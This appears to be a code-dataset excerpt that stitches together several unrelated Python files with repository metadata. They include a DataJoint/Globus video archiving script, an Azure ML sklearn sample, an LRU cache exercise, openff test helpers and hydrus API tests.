log.info('transferring {} to {}'.format(srcp, dstp)) if not gsm.cp(srcp, dstp): # XXX: check if exists 1st? emsg = "couldn't transfer {} to {}".format(srcp, dstp) log.error(emsg) raise dj.DataJointError(emsg) lfname = lep_dir + lsp # local filesysem copy location dftmap[s['position']] = TrackingIngest.load_campath(lfname) if len(h2o) != 1 or len(sdate) != 1: log.info('skipping. bad h2o {} or session date {}'.format( h2o, sdate)) return h2o, sdate = next(iter(h2o)), next(iter(sdate)) for d in dvfmap: if d in dftmap: # remap video no -> trial dtfmap[d] = {dftmap[d][v]: dict(dvfmap[d][v], trial=dftmap[d][v]) for v in dvfmap[d]} else: # assign video no -> trial dtfmap[d] = {k: dict(v, trial=v['video']) for k, v in dvfmap[d].items()} # DataSet ds_type = 'tracking-video' ds_name = '{}_{}_{}'.format(h2o, sdate, ds_type) ds_key = {'dataset_name': ds_name, 'globus_alias': globus_alias} if (DataSet & ds_key): log.info('DataSet: {} already exists. Skipping.'.format( ds_key)) return DataSet.insert1({**ds_key, 'dataset_type': ds_type}, allow_direct_insert=True) # ArchivedSession as_key = {k: v for k, v in smap[skey].items() if k in ArchivedSession.primary_key} ArchivedSession.insert1( {**as_key, 'globus_alias': globus_alias}, allow_direct_insert=True, skip_duplicates=True) for d in dtfmap: # ArchivedTrackingVideo atv_key = {**as_key, **ds_key, 'tracking_device': tpos_dev[d]} ArchivedTrackingVideo.insert1( atv_key, allow_direct_insert=True) for t in dtfmap[d]: for f in dtfmap[d][t]: DataSet.PhysicalFile.insert1( {**ds_key, **f}, allow_direct_insert=True, ignore_extra_fields=True) ArchivedTrackingVideo.TrialVideo.insert1( {**atv_key, **ds_key, 'trial': t, 'file_subpath': f['file_subpath']}, allow_direct_insert=True) # end commit() for ep, dirname, node in gsm.fts('{}:{}'.format(rep, rep_sub)): vdir = re.match('([a-z]+[0-9]+)/([0-9]{8})/video', dirname) if not vdir or node['DATA_TYPE'] != 'file': continue h2o, sdate = vdir[1], vdir[2] skey_i = '{}/{}'.format(h2o, sdate) if skey_i != skey: if skey and skey in smap: with dj.conn().transaction: try: commit(skey, sfiles) except Exception as e: log.error( 'Exception {} committing {}. files: {}'.format( repr(e), skey, sfiles)) skey, sfiles = skey_i, [] if skey not in smap: if skey not in sskip: log.debug('session {} not known. skipping'.format(skey)) sskip.add(skey) continue fname = node['name'] log.debug('checking {}/{}'.format(dirname, fname)) if '.' not in fname: log.debug('skipping {} - no dot in fname'.format(fname)) continue froot, fext = fname.split('.', 1) ftype = {g['file_type']: g for g in ftmap.values() if fnmatch(fname, g['file_glob'])} if len(ftype) != 1: log.debug('skipping {} - incorrect type matches: {}'.format( fname, ftype)) continue ftype = next(iter(ftype.values()))['file_type'] log.debug('processing as {}'.format(ftype)) file_subpath = '{}/{}'.format(dirname, fname) if ftype == 'tracking-video-map': # e.g. dl55_20190108_side.txt h2o_f, fdate, pos = froot.split('_') sfiles.append({'water_restriction_number': h2o, 'session_date': '{}-{}-{}'.format( sdate[:4], sdate[4:6], sdate[6:]), 'position': pos, 'file_subpath': file_subpath, 'file_type': ftype}) else: # tracking-video-map # e.g. dl41_side_998-0000.avi or dl41_side_998-0000_00.avi h2o_f, pos, video = froot.replace('-', '_').split('_')[:3] sfiles.append({'water_restriction_number': h2o, 'session_date': '{}-{}-{}'.format( sdate[:4], sdate[4:6], sdate[6:]), 'position': pos, 'video': int(video), 'file_subpath': file_subpath, 'file_type': ftype}) def make(self, key): """ discover files in local endpoint and transfer/register """ log.info('ArchivedVideoFile.make(): {}'.format(key)) # {'tracking_device': 'Camera 0', 'subject_id': 432572, 'session': 1} globus_alias = 'raw-video' le = GlobusStorageLocation.local_endpoint(globus_alias) lep, lep_sub, lep_dir = (le['endpoint'], le['endpoint_subdir'], le['endpoint_path']) re = (GlobusStorageLocation & {'globus_alias': globus_alias}).fetch1() rep, rep_sub = re['globus_endpoint'], re['globus_path'] log.info('local_endpoint: {}:{} -> {}'.format(lep, lep_sub, lep_dir)) log.info('remote_endpoint: {}:{}'.format(rep, rep_sub)) h2o = (lab.WaterRestriction & key).fetch1('water_restriction_number') session = (experiment.Session & key).fetch1() sdate = session['session_date'] sdate_sml = "{}{:02d}{:02d}".format(sdate.year, sdate.month, sdate.day) dev = (tracking.TrackingDevice & key).fetch1() trls = (experiment.SessionTrial & key).fetch( order_by='trial', as_dict=True) tracking_ingest = self.get_ingest() tdev = dev['tracking_device'] # NOQA: notused tpos = dev['tracking_position'] camtrial = '{}_{}_{}.txt'.format(h2o, sdate_sml, tpos) vbase = pathlib.Path(lep_dir, h2o, sdate_sml, 'video') campath = vbase / camtrial if not campath.exists(): # XXX: uses 1st found log.warning('trial map {} n/a! skipping.'.format(campath)) return log.info('loading trial map: {}'.format(campath)) vmap = {v: k for k, v in tracking_ingest.TrackingIngest.load_campath(campath).items()} log.debug('loaded video map: {}'.format(vmap)) # add ArchivedSession as_key = {k: v for k, v in key.items() if k in experiment.Session.primary_key} as_rec = {**as_key, 'globus_alias': globus_alias} ArchivedSession.insert1(as_rec, allow_direct_insert=True, skip_duplicates=True) # add DataSet ds_type = 'tracking-video' ds_name = '{}_{}_{}_{}'.format(h2o, sdate.isoformat(), ds_type, tpos) ds_key = {'globus_alias': globus_alias, 'dataset_name': ds_name} ds_rec = {**ds_key, 'dataset_type': ds_type} DataSet.insert1(ds_rec, allow_direct_insert=True) # add ArchivedVideoTracking vt_key = {**as_key, 'tracking_device': tdev} vt_rec = {**vt_key, 'globus_alias': globus_alias, 'dataset_name': ds_name} self.insert1(vt_rec) filetype = 'tracking-video-trial' for t in trls: trial = t['trial'] log.info('.. tracking trial {} ({})'.format(trial, t)) if t['trial'] not in vmap: log.warning('trial {} not in video map. skipping!'.format(t)) continue vmatch = '{}_{}_{}-*'.format(h2o, tpos, vmap[trial]) log.debug('vbase: {}, vmatch: {}'.format(vbase, vmatch)) vglob = list(vbase.glob(vmatch)) if len(vglob) != 1: emsg = 'incorrect videos found in {}: {}'.format(vbase, vglob) log.warning(emsg) raise dj.DataJointError(emsg) vfile = vglob[0].name gfile = '{}/{}/{}/{}'.format( h2o, sdate_sml, 'video', vfile) # subpath srcp = '{}:{}/{}'.format(lep, lep_sub, gfile) # source path dstp = '{}:{}/{}'.format(rep, rep_sub, gfile) # dest path gsm = self.get_gsm() gsm.activate_endpoint(lep) # XXX: cache / prevent duplicate RPC? gsm.activate_endpoint(rep) # XXX: cache / prevent duplicate RPC? log.info('transferring {} to {}'.format(srcp, dstp)) if not gsm.cp(srcp, dstp): emsg = "couldn't transfer {} to {}".format(srcp, dstp) log.error(emsg) raise dj.DataJointError(emsg) pf_key = {**ds_key, 'file_subpath': vfile} pf_rec = {**pf_key, 'file_type': filetype} DataSet.PhysicalFile.insert1({**pf_rec}, allow_direct_insert=True) trk_key = {k: v for k, v in {**key, 'trial': trial}.items() if k in experiment.SessionTrial.primary_key} tv_rec = {**vt_key, **trk_key, **pf_key} self.TrialVideo.insert1({**tv_rec}) def test_flist(fname='globus-index-full.txt'): ''' spoof tester for discover methods expects: f: ep:/path/to/file d: ep:/path/to/direct etc. (aka: globus-shell 'find' output) replace the line: for ep, dirname, node in gsm.fts('{}:{}'.format(rep, rep_sub)): with: for ep, dirname, node in test_flist('globus-list.txt'): to test against the file 'globus-list.txt' ''' with open(fname, 'r') as infile: for l in infile: try: t, fp = l.split(' ') fp = fp.split(':')[1].lstrip('/').rstrip('\n') dn, bn = os.path.split(fp) if t == 'f:': yield ('ep', dn, {'DATA_TYPE': 'file', 'name': bn}) else: yield ('ep', dn, {'DATA_TYPE': 'dunno', 'path': bn}) except ValueError as e: if 'too many values' in repr(e): pass
11,374
13,905
243
4d8532ecf10ba04d9280c47b5810edf61e1c76f0
311
py
Python
sftp/__init__.py
hiaoxui/span-finder
c5f9886eae12921796b33bdb84ffcb6bfa905cb4
[ "Apache-2.0" ]
3
2021-05-08T15:35:21.000Z
2022-01-24T02:52:55.000Z
sftp/__init__.py
hiaoxui/span-finder
c5f9886eae12921796b33bdb84ffcb6bfa905cb4
[ "Apache-2.0" ]
null
null
null
sftp/__init__.py
hiaoxui/span-finder
c5f9886eae12921796b33bdb84ffcb6bfa905cb4
[ "Apache-2.0" ]
1
2021-09-07T22:31:40.000Z
2021-09-07T22:31:40.000Z
from .data_reader import ( BetterDatasetReader, SRLDatasetReader ) from .metrics import SRLMetric, BaseF, ExactMatch, FBetaMixMeasure from .models import SpanModel from .modules import ( MLPSpanTyping, SpanTyping, SpanFinder, BIOSpanFinder ) from .predictor import SpanPredictor from .utils import Span
28.272727
66
0.807074
from .data_reader import ( BetterDatasetReader, SRLDatasetReader ) from .metrics import SRLMetric, BaseF, ExactMatch, FBetaMixMeasure from .models import SpanModel from .modules import ( MLPSpanTyping, SpanTyping, SpanFinder, BIOSpanFinder ) from .predictor import SpanPredictor from .utils import Span
0
0
0
31ae962fdd5c782121ff85fe6854a2b889e2cbfd
2,334
py
Python
docs/source/examples/7/sample.py
kumar-pratik/hi-ml
a108cf4ea244a76127adedc0ca60f0a5afdfb3e8
[ "MIT" ]
34
2021-08-18T13:27:36.000Z
2022-03-26T01:25:36.000Z
docs/source/examples/7/sample.py
kumar-pratik/hi-ml
a108cf4ea244a76127adedc0ca60f0a5afdfb3e8
[ "MIT" ]
111
2021-08-18T13:19:46.000Z
2022-03-30T05:57:01.000Z
docs/source/examples/7/sample.py
kumar-pratik/hi-ml
a108cf4ea244a76127adedc0ca60f0a5afdfb3e8
[ "MIT" ]
6
2021-09-13T12:07:58.000Z
2022-03-24T16:31:06.000Z
# ------------------------------------------------------------------------------------------ # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License (MIT). See LICENSE in the repo root for license information. # ------------------------------------------------------------------------------------------ # From: # https://github.com/Azure/MachineLearningNotebooks/blob/master/how-to-use-azureml/ml-frameworks/scikit-learn/train-hyperparameter-tune-deploy-with-sklearn/train_iris.py import argparse from pathlib import Path import numpy as np from sklearn.metrics import confusion_matrix from sklearn.model_selection import train_test_split from health_azure import submit_to_azure_if_needed if __name__ == "__main__": main()
39.559322
169
0.654242
# ------------------------------------------------------------------------------------------ # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License (MIT). See LICENSE in the repo root for license information. # ------------------------------------------------------------------------------------------ # From: # https://github.com/Azure/MachineLearningNotebooks/blob/master/how-to-use-azureml/ml-frameworks/scikit-learn/train-hyperparameter-tune-deploy-with-sklearn/train_iris.py import argparse from pathlib import Path import numpy as np from sklearn.metrics import confusion_matrix from sklearn.model_selection import train_test_split from health_azure import submit_to_azure_if_needed def main() -> None: run_info = submit_to_azure_if_needed( compute_cluster_name="lite-testing-ds2", default_datastore="himldatasets", input_datasets=["himl_sample7_input"], wait_for_completion=True, wait_for_completion_show_output=True) parser = argparse.ArgumentParser() parser.add_argument('--kernel', type=str, default='linear', help='Kernel type to be used in the algorithm') parser.add_argument('--penalty', type=float, default=1.0, help='Penalty parameter of the error term') args = parser.parse_args() print(f'Kernel type:{args.kernel}') print(f'Penalty: {args.penalty}') # X -> features, y -> label input_folder = run_info.input_datasets[0] or Path("dataset") X = np.loadtxt(fname=input_folder / "X.csv", delimiter=',', skiprows=1) y = np.loadtxt(fname=input_folder / "y.csv", dtype='str', delimiter=',', skiprows=1) # dividing X, y into train and test data X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0) # training a linear SVM classifier from sklearn.svm import SVC svm_model_linear = SVC(kernel=args.kernel, C=args.penalty).fit(X_train, y_train) svm_predictions = svm_model_linear.predict(X_test) # model accuracy for X_test accuracy = svm_model_linear.score(X_test, y_test) print('Accuracy of SVM classifier on test set: {:.2f}'.format(accuracy)) # creating a confusion matrix cm = confusion_matrix(y_test, svm_predictions) print(cm) if __name__ == "__main__": main()
1,536
0
23
6599733b0213579573a907d9fc5ab78c8a716ed8
510
py
Python
tests/test_cli.py
vfranca/pp
db9e15a490e5b28a177cdcd8f448d21fd5bec8d7
[ "MIT" ]
null
null
null
tests/test_cli.py
vfranca/pp
db9e15a490e5b28a177cdcd8f448d21fd5bec8d7
[ "MIT" ]
null
null
null
tests/test_cli.py
vfranca/pp
db9e15a490e5b28a177cdcd8f448d21fd5bec8d7
[ "MIT" ]
null
null
null
#!/usr/bin/env python # -*- coding: utf-8 -*- import unittest from click.testing import CliRunner from pivotpoint import pp from pivotpoint import cli
26.842105
74
0.668627
#!/usr/bin/env python # -*- coding: utf-8 -*- import unittest from click.testing import CliRunner from pivotpoint import pp from pivotpoint import cli class TestPivotPoint(unittest.TestCase): def setUp(self): self.runner = CliRunner() def tearDown(self): """Tear down test fixtures, if any.""" def test_command_line_interface(self): result = self.runner.invoke(cli.main, ["34.80", "32.80", "33.40"]) assert "35.67\n34.54\n33.67\n32.54\n31.67\n" in result.output
191
144
23
6c59951f383e22b4b6dd672512b717c4ad1ef094
1,086
py
Python
rackio/dao/controls.py
crivero7/rackio-framework
d3362041b1fc4c3af7eb51ac06b1f0f1b5aa497c
[ "MIT" ]
null
null
null
rackio/dao/controls.py
crivero7/rackio-framework
d3362041b1fc4c3af7eb51ac06b1f0f1b5aa497c
[ "MIT" ]
null
null
null
rackio/dao/controls.py
crivero7/rackio-framework
d3362041b1fc4c3af7eb51ac06b1f0f1b5aa497c
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- """rackio/dao/controls.py This module implements Controls Data Objects Access. """ from .core import RackioDAO
18.40678
52
0.57919
# -*- coding: utf-8 -*- """rackio/dao/controls.py This module implements Controls Data Objects Access. """ from .core import RackioDAO class ControlsDAO(RackioDAO): def get_all(self): app = self.get_app() manager = app.get_manager("control") result = list() for control in manager.get_controls(): result.append(control.serialize()) return result def get(self, name): app = self.get_app() manager = app.get_manager("control") control = manager.get_control(name) if control: return control.serialize() class RulesDAO(RackioDAO): def get_all(self): app = self.get_app() manager = app.get_manager("control") result = list() for rule in manager.get_rules(): result.append(rule.serialize()) return result def get(self, name): app = self.get_app() manager = app.get_manager("control") rule = manager.get_rule(name) if rule: return rule.serialize()
777
13
158
b3ba1dada5fdca8c0505e224c5e297d351338eaf
721
py
Python
AddPDFBookmarks/handle_pdf.py
wanghuohuo0716/py-project
b771b8005d72843df1653ce68ddb67ccf77a57a8
[ "MIT" ]
92
2018-02-26T07:59:27.000Z
2022-03-31T08:57:51.000Z
AddPDFBookmarks/handle_pdf.py
Linkeer365/py-project
b771b8005d72843df1653ce68ddb67ccf77a57a8
[ "MIT" ]
2
2020-08-19T00:55:52.000Z
2021-03-08T07:37:32.000Z
AddPDFBookmarks/handle_pdf.py
Linkeer365/py-project
b771b8005d72843df1653ce68ddb67ccf77a57a8
[ "MIT" ]
53
2018-09-07T14:26:33.000Z
2022-03-31T08:57:53.000Z
# coding:utf-8 # 添加PDF书签 from pdf_utils import MyPDFHandler,PDFHandleMode as mode import ConfigParser import sys reload(sys) sys.setdefaultencoding('utf-8') if __name__ == '__main__': main()
31.347826
88
0.71706
# coding:utf-8 # 添加PDF书签 from pdf_utils import MyPDFHandler,PDFHandleMode as mode import ConfigParser import sys reload(sys) sys.setdefaultencoding('utf-8') def main(): # 从配置文件中读取配置信息 cf = ConfigParser.SafeConfigParser() cf.read('./info.conf') pdf_path = cf.get('info','pdf_path') bookmark_file_path = cf.get('info','bookmark_file_path') page_offset = cf.getint('info','page_offset') new_pdf_file_name = cf.get('info','new_pdf_file_name') pdf_handler = MyPDFHandler(pdf_path,mode = mode.NEWLY) pdf_handler.add_bookmarks_by_read_txt(bookmark_file_path,page_offset = page_offset) pdf_handler.save2file(new_pdf_file_name) if __name__ == '__main__': main()
516
0
25
28cd58401f73165d35b3541ef644b2fdcb572816
1,638
py
Python
openff/utilities/testing.py
openforcefield/openff-utilities
89255d6cc9513df6ad5293841e86ab1f968f7e3b
[ "MIT" ]
null
null
null
openff/utilities/testing.py
openforcefield/openff-utilities
89255d6cc9513df6ad5293841e86ab1f968f7e3b
[ "MIT" ]
17
2021-06-09T06:46:20.000Z
2022-03-02T00:30:41.000Z
openff/utilities/testing.py
openforcefield/openff-utilities
89255d6cc9513df6ad5293841e86ab1f968f7e3b
[ "MIT" ]
null
null
null
from typing import List, Optional, Union import pytest from openff.utilities.utilities import has_executable, has_package def skip_if_missing(package_name: str, reason: Optional[str] = None): """ Helper function to generate a pytest.mark.skipif decorator for any package. This allows tests to be skipped if some optional dependency is not found. Parameters ---------- package_name : str The name of the package that is required for a test(s) reason : str, optional Explanation of why the skipped it to be tested Returns ------- requires_package : _pytest.mark.structures.MarkDecorator A pytest decorator that will skip tests if the package is not available """ if not reason: reason = f"Package {package_name} is required, but was not found." requires_package = pytest.mark.skipif(not has_package(package_name), reason=reason) return requires_package def skip_if_missing_exec(exec: Union[str, List[str]]): """Helper function to generate a pytest.mark.skipif decorator if an executable(s) is not found.""" if isinstance(exec, str): execs: List = [exec] elif isinstance(exec, list): execs: List = exec # type: ignore[no-redef] else: raise ValueError( "Bad type passed to skip_if_missing_exec. " f"Found type {type(exec)}" ) found_exec = False for exec_ in execs: found_exec = found_exec or has_executable(exec_) reason = f"Package {str(exec)} is required, but was not found." mark = pytest.mark.skipif(not found_exec, reason=reason) return mark
32.117647
87
0.681319
from typing import List, Optional, Union import pytest from openff.utilities.utilities import has_executable, has_package def skip_if_missing(package_name: str, reason: Optional[str] = None): """ Helper function to generate a pytest.mark.skipif decorator for any package. This allows tests to be skipped if some optional dependency is not found. Parameters ---------- package_name : str The name of the package that is required for a test(s) reason : str, optional Explanation of why the skipped it to be tested Returns ------- requires_package : _pytest.mark.structures.MarkDecorator A pytest decorator that will skip tests if the package is not available """ if not reason: reason = f"Package {package_name} is required, but was not found." requires_package = pytest.mark.skipif(not has_package(package_name), reason=reason) return requires_package def skip_if_missing_exec(exec: Union[str, List[str]]): """Helper function to generate a pytest.mark.skipif decorator if an executable(s) is not found.""" if isinstance(exec, str): execs: List = [exec] elif isinstance(exec, list): execs: List = exec # type: ignore[no-redef] else: raise ValueError( "Bad type passed to skip_if_missing_exec. " f"Found type {type(exec)}" ) found_exec = False for exec_ in execs: found_exec = found_exec or has_executable(exec_) reason = f"Package {str(exec)} is required, but was not found." mark = pytest.mark.skipif(not found_exec, reason=reason) return mark
0
0
0
8ef5b889f2b72b0ee8d71a6019e587e98cab7064
5,122
py
Python
projects/Show me the Data Structures/problem_1.py
gmendozah/Data-Structures-and-Algorithms
07474db45acfe42855cc0f4cc968c0564b2cb91a
[ "MIT" ]
5
2021-10-08T11:21:08.000Z
2022-01-24T22:40:03.000Z
projects/Show me the Data Structures/problem_1.py
gmendozah/Data-Structures-and-Algorithms
07474db45acfe42855cc0f4cc968c0564b2cb91a
[ "MIT" ]
null
null
null
projects/Show me the Data Structures/problem_1.py
gmendozah/Data-Structures-and-Algorithms
07474db45acfe42855cc0f4cc968c0564b2cb91a
[ "MIT" ]
3
2021-12-13T06:50:58.000Z
2022-02-05T03:38:49.000Z
if __name__ == '__main__': test_case_1() test_case_2() test_case_3()
31.423313
115
0.557595
class Node: def __init__(self, key=None, value=None): self.key = key self.value = value self.next = None self.prev = None class LRU_Cache(object): def __init__(self, capacity): if capacity < 1: print('LRUCache should have capacity > 0') return # Initialize class variables self.capacity = capacity self.size = 0 self.map = dict() self.head = None # this node represents the least recently used self.tail = None # this node represents the most recently used def get_capacity(self): return self.capacity def get(self, key): # Retrieve item from provided key. Return -1 if nonexistent. if key is None: return -1 elif key not in self.map: return -1 else: node = self.map[key] self.move_to_front(node) return node.value def set(self, key, value): # Set the value if the key is not present in the cache. If the cache is at capacity remove the oldest item. """ First. we validate the input key Second. we verify if key is already in the map If key in map: We update the node value and move it to the front If not in map: We create a new node and set it in the map Third: we validate if we passed the cache capacity """ if key is None or value is None: return -1 elif key not in self.map: node = Node(key, value) self.map[key] = node self.add(node) else: node = self.map[key] node.value = value self.move_to_front(node) if self.capacity < 0: self.remove_lru() def move_to_front(self, node): self.remove(node) self.add(node) def add(self, node): # add data to the next attribute of the tail (i.e. the end of the queue) # if head and tail have no values if self.head is None or self.tail is None: self.head = node self.tail = node # if the linked list has values already else: node.next = self.head node.prev = None self.head.prev = node self.head = node self.capacity = self.capacity - 1 def remove(self, node): # if the node we want to delete is the head if self.head.key == node.key: next_node = self.head.next self.head = next_node # if the node we want to delete is the tail elif self.tail.key == node.key: prev_node = self.tail.prev self.tail = prev_node # if none of the above happens else: prev_node = node.prev next_node = node.next prev_node.next = next_node next_node.prev = prev_node self.capacity += 1 def remove_lru(self): node = self.tail self.remove(node) del self.map[node.key] if __name__ == '__main__': def test_case_1(): # invalid length cache test case our_cache = LRU_Cache(-1) # should show an invalid capacity value def test_case_2(): # normal length cache test case our_cache = LRU_Cache(5) our_cache.set(1, 11) our_cache.set(2, 22) our_cache.set(3, 33) our_cache.set(4, 44) our_cache.set(5, 55) our_cache.set(6, 66) our_cache.set(7, 77) print(our_cache.get(1)) # returns -1 print(our_cache.get(2)) # returns -1 print(our_cache.get(3)) # returns 33 print(our_cache.get(7)) # returns 77 print(our_cache.get(6)) # returns 66 print(our_cache.get(4)) # returns 44 our_cache.set(8, 88) print(our_cache.get(5)) # returns -1 def test_case_3(): # short cache test case our_cache = LRU_Cache(3) our_cache.set(1, 1) our_cache.set(2, 2) our_cache.set(3, 3) our_cache.set(4, 4) print(our_cache.get(4)) # Expected Value = 4 print(our_cache.get(1)) # Expected Value = -1 our_cache.set(2, 4) print(our_cache.get(2)) # Expected Value = 4 our_cache.set(5, 5) print(our_cache.get(3)) # Expected Value = -1 print(our_cache.get(5)) # Expected Value = 5 our_cache.set(2, 6) print(our_cache.get(2)) # Expected Value = 6 our_cache.set(6, 6) print(our_cache.get(4)) # Expected Value = -1 print(our_cache.get(6)) # Expected Value = 6 our_cache.set(5, 10) our_cache.set(7, 7) print(our_cache.get(2)) # Expected Value = -1 print(our_cache.get(7)) # Expected Value = 7 print(our_cache.get(6)) # Expected Value = 6 print(our_cache.get(5)) # Expected Value = 10 print(our_cache.get(5)) # Expected Value = 10 our_cache.set(8, 8) print(our_cache.get(7)) # Expected Value = -1 test_case_1() test_case_2() test_case_3()
3,821
1,075
151
8246e38f21bcb46e020f248157401bcc92b6f2e7
45,802
py
Python
hydrus/tests/test_app.py
vcode11/hydrus
4ed8ada7ed8fd7d8897e744bae410b312f4cfb83
[ "MIT" ]
1
2019-12-04T12:54:21.000Z
2019-12-04T12:54:21.000Z
hydrus/tests/test_app.py
vcode11/hydrus
4ed8ada7ed8fd7d8897e744bae410b312f4cfb83
[ "MIT" ]
3
2019-12-21T04:15:23.000Z
2020-04-07T05:11:05.000Z
hydrus/tests/test_app.py
vcode11/hydrus
4ed8ada7ed8fd7d8897e744bae410b312f4cfb83
[ "MIT" ]
null
null
null
"""Test for checking if the response format is proper. Run test_crud before running this.""" import unittest import random import string import json import re import uuid from hydrus.app_factory import app_factory from hydrus.socketio_factory import create_socket from hydrus.utils import set_session, set_doc, set_api_name, set_page_size from hydrus.data import doc_parse, crud from hydra_python_core import doc_maker from hydra_python_core.doc_writer import HydraLink from hydrus.samples import doc_writer_sample from sqlalchemy import create_engine from sqlalchemy.orm import sessionmaker, scoped_session from hydrus.data.db_models import Base def gen_dummy_object(class_title, doc): """Create a dummy object based on the definitions in the API Doc. :param class_title: Title of the class whose object is being created. :param doc: ApiDoc. :return: A dummy object of class `class_title`. """ object_ = { "@type": class_title } for class_path in doc.parsed_classes: if class_title == doc.parsed_classes[class_path]["class"].title: for prop in doc.parsed_classes[class_path]["class"].supportedProperty: if isinstance(prop.prop, HydraLink) or prop.write is False: continue if "vocab:" in prop.prop: prop_class = prop.prop.replace("vocab:", "") object_[prop.title] = gen_dummy_object(prop_class, doc) else: object_[prop.title] = ''.join(random.choice( string.ascii_uppercase + string.digits) for _ in range(6)) return object_ class ViewsTestCase(unittest.TestCase): """Test Class for the app.""" @classmethod def setUpClass(self): """Database setup before the tests.""" print("Creating a temporary database...") engine = create_engine('sqlite:///:memory:') Base.metadata.create_all(engine) session = scoped_session(sessionmaker(bind=engine)) self.session = session self.API_NAME = "demoapi" self.page_size = 1 self.HYDRUS_SERVER_URL = "http://hydrus.com/" self.app = app_factory(self.API_NAME) self.socketio = create_socket(self.app, self.session) print("going for create doc") self.doc = doc_maker.create_doc( doc_writer_sample.api_doc.generate(), self.HYDRUS_SERVER_URL, self.API_NAME) test_classes = doc_parse.get_classes(self.doc.generate()) test_properties = doc_parse.get_all_properties(test_classes) doc_parse.insert_classes(test_classes, self.session) doc_parse.insert_properties(test_properties, self.session) print("Classes and properties added successfully.") print("Setting up hydrus utilities... ") self.api_name_util = set_api_name(self.app, self.API_NAME) self.session_util = set_session(self.app, self.session) self.doc_util = set_doc(self.app, self.doc) self.page_size_util = set_page_size(self.app, self.page_size) self.client = self.app.test_client() print("Creating utilities context... ") self.api_name_util.__enter__() self.session_util.__enter__() self.doc_util.__enter__() self.client.__enter__() print("Setup done, running tests...") @classmethod def tearDownClass(self): """Tear down temporary database and exit utilities""" self.client.__exit__(None, None, None) self.doc_util.__exit__(None, None, None) self.session_util.__exit__(None, None, None) self.api_name_util.__exit__(None, None, None) self.session.close() def test_Index(self): """Test for the index.""" response_get = self.client.get("/{}".format(self.API_NAME)) endpoints = json.loads(response_get.data.decode('utf-8')) response_post = self.client.post( "/{}".format(self.API_NAME), data=dict(foo="bar")) response_put = self.client.put( "/{}".format(self.API_NAME), data=dict(foo="bar")) response_delete = self.client.delete("/{}".format(self.API_NAME)) assert "@context" in endpoints assert endpoints["@id"] == "/{}".format(self.API_NAME) assert endpoints["@type"] == "EntryPoint" assert response_get.status_code == 200 assert response_post.status_code == 405 assert response_put.status_code == 405 assert response_delete.status_code == 405 def test_EntryPoint_context(self): """Test for the EntryPoint context.""" response_get = self.client.get( "/{}/contexts/EntryPoint.jsonld".format(self.API_NAME)) response_get_data = json.loads(response_get.data.decode('utf-8')) response_post = self.client.post( "/{}/contexts/EntryPoint.jsonld".format(self.API_NAME), data={}) response_delete = self.client.delete( "/{}/contexts/EntryPoint.jsonld".format(self.API_NAME)) assert response_get.status_code == 200 assert "@context" in response_get_data assert response_post.status_code == 405 assert response_delete.status_code == 405 def test_Vocab(self): """Test the vocab.""" response_get = self.client.get("/{}/vocab#".format(self.API_NAME)) response_get_data = json.loads(response_get.data.decode('utf-8')) assert "@context" in response_get_data assert response_get_data["@type"] == "ApiDocumentation" assert response_get_data["@id"] == "{}{}/vocab".format( self.HYDRUS_SERVER_URL, self.API_NAME) assert response_get.status_code == 200 response_delete = self.client.delete( "/{}/vocab#".format(self.API_NAME)) assert response_delete.status_code == 405 response_put = self.client.put( "/{}/vocab#".format(self.API_NAME), data=json.dumps(dict(foo='bar'))) assert response_put.status_code == 405 response_post = self.client.post( "/{}/vocab#".format(self.API_NAME), data=json.dumps(dict(foo='bar'))) assert response_post.status_code == 405 def test_Collections_GET(self): """Test GET on collection endpoints.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: response_get = self.client.get(endpoints[endpoint]) # pdb.set_trace() assert response_get.status_code == 200 response_get_data = json.loads( response_get.data.decode('utf-8')) assert "@context" in response_get_data assert "@id" in response_get_data assert "@type" in response_get_data assert "members" in response_get_data # Check the item URI has the valid format, so it can be dereferenced if len(response_get_data["members"]) > 0: for item in response_get_data["members"]: class_type = item["@type"] if class_type in self.doc.parsed_classes: class_ = self.doc.parsed_classes[class_type]["class"] class_methods = [ x.method for x in class_.supportedOperation] if "GET" in class_methods: item_response = self.client.get( response_get_data["members"][0]["@id"]) assert item_response.status_code == 200 def test_pagination(self): """Test basic pagination""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: response_get = self.client.get(endpoints[endpoint]) assert response_get.status_code == 200 response_get_data = json.loads( response_get.data.decode('utf-8')) assert "view" in response_get_data assert "first" in response_get_data["view"] assert "last" in response_get_data["view"] if "next" in response_get_data["view"]: response_next = self.client.get(response_get_data["view"]["next"]) assert response_next.status_code == 200 response_next_data = json.loads( response_next.data.decode('utf-8')) assert "previous" in response_next_data["view"] break def test_Collections_PUT(self): """Test insert data to the collection.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: collection = self.doc.collections[collection_name]["collection"] dummy_object = gen_dummy_object( collection.class_.title, self.doc) good_response_put = self.client.put( endpoints[endpoint], data=json.dumps(dummy_object)) assert good_response_put.status_code == 201 def test_object_POST(self): """Test replace of a given object using ID.""" index = self.client.get("/{}".format(self.API_NAME)) assert index.status_code == 200 endpoints = json.loads(index.data.decode('utf-8')) for endpoint in endpoints: collection_name = "/".join(endpoints[endpoint].split( "/{}/".format(self.API_NAME))[1:]) if collection_name in self.doc.collections: collection = self.doc.collections[collection_name]["collection"] class_ = self.doc.parsed_classes[collection.class_.title]["class"] class_methods = [x.method for x in class_.supportedOperation] dummy_object = gen_dummy_object( collection.class_.title, self.doc) initial_put_response = self.client.put( endpoints[endpoint], data=json.dumps(dummy_object)) assert initial_put_response.status_code == 201 response = json.loads( initial_put_response.data.decode('utf-8')) regex = r'(.*)ID (.{36})* (.*)' matchObj = re.match(regex, response["description"]) assert matchObj is not None id_ = matchObj.group(2) if "POST" in class_methods: dummy_object = gen_dummy_object( collection.class_.title, self.doc) 